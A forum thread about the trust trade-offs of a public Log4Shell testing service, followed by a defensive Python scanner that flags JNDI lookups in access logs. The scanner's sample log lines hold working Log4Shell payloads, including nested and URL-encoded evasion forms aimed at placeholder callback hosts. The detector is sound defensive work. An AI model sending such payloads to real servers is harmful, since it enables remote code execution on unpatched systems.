I'm sure this is well-intentioned, but it seems also true that using this tool will give a third party, however benevolent, identification of your vulnerable website.
You're right, but this has always been the trade-off with tools like this. You put some trust in the tool's authors and gain some insight in return. Remember the services that tested for Heartbleed (e.g. https://filippo.io/Heartbleed/)? Fairly similar trade-off, but still these tools were widely used.
Bad-intentioned people already have tools to do this.
alexbakker | 4 years ago
If you don't trust me and have some technical know-how, you can self host the service. It's open source: https://github.com/alexbakker/log4shell-tools.
Sohcahtoa82 | 4 years ago
My company's website has a couple dozen entries in its logs from people testing Log4Shell. We have no way of knowing if any of these are benevolent people trying to notify companies of the vulnerability, people hoping for a beg bounty, or actual attackers.
It's not hard to write a tool that scrapes Shodan.io and sends Log4Shell payloads to everything.
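The log entries mentioned above are the defender's side of this discussion: whoever sent them, the requests look the same in an access log. The following is an added example, not code from the thread or from alexbakker's log4shell-tools, that scans web-server access-log lines for JNDI lookup strings. It URL-decodes each line and collapses the nested `${lower:...}`, `${upper:...}` and `${...:-x}` lookups that Log4j resolves before the JNDI lookup runs, so the match is made against the effective string rather than the cosmetic one. The log lines, client addresses and callback hosts are constructed for the example (reserved documentation ranges and the `.invalid` TLD) and are not from anyone's real logs.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format). Addresses are from
# RFC 5737 documentation ranges and callback hosts use the reserved .invalid TLD.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [11/Dec/2021:03:15:22 +0000] "GET /login HTTP/1.1" 200 830 "-" "${jndi:ldap://callback.example.invalid/a}"',
    '198.51.100.23 - - [11/Dec/2021:03:15:23 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://callback.example.invalid/b} HTTP/1.1" 404 210 "-" "curl/7.79.1"',
    '192.0.2.55 - - [11/Dec/2021:03:16:01 +0000] "POST /api HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.99:1099/c}"',
    '192.0.2.88 - - [11/Dec/2021:03:16:40 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fd%7D HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Dec/2021:03:17:40 +0000] "GET /about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# Nested lookups that Log4j 2.x evaluates before the JNDI lookup itself.
# Innermost first: the character class excludes '$' so a lookup containing
# another lookup is not matched until its inner one has been collapsed.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${missing:-x} / ${::-x}
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse case and default-value lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


@dataclass
class Finding:
    client: str          # first field of the log line
    scheme: str          # ldap, rmi, dns, ...
    callback_host: str   # host[:port] the lookup would reach out to
    obfuscated: bool     # True if decoding/normalizing changed the line
    line: str            # the original log line, for triage


def scan_line(line: str) -> Optional[Finding]:
    """Return a Finding if the line carries a JNDI lookup after decoding, else None."""
    normalized = normalize_lookups(unquote(line))
    m = _JNDI.search(normalized)
    if not m:
        return None
    return Finding(
        client=line.split(" ", 1)[0],
        scheme=m.group(1).lower(),
        callback_host=m.group(2),
        obfuscated=normalized != line,
        line=line,
    )


def scan_log(lines: List[str]) -> List[Finding]:
    """Scan every line; keep only the hits, in log order."""
    return [f for f in (scan_line(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        flag = "obfuscated" if f.obfuscated else "plain"
        print(f"{f.client:15} {f.scheme:5} -> {f.callback_host} ({flag})")
```

The `obfuscated` flag is worth keeping in the output: a plain `${jndi:ldap://...}` in a User-Agent is typical of bulk scanning, while nested or URL-encoded forms are usually an attempt to get past a naive string filter. The patterns here cover the lookup forms documented in public detection rules, not every encoding Log4j accepts, so treat a clean scan as absence of these patterns rather than proof that no lookup was delivered.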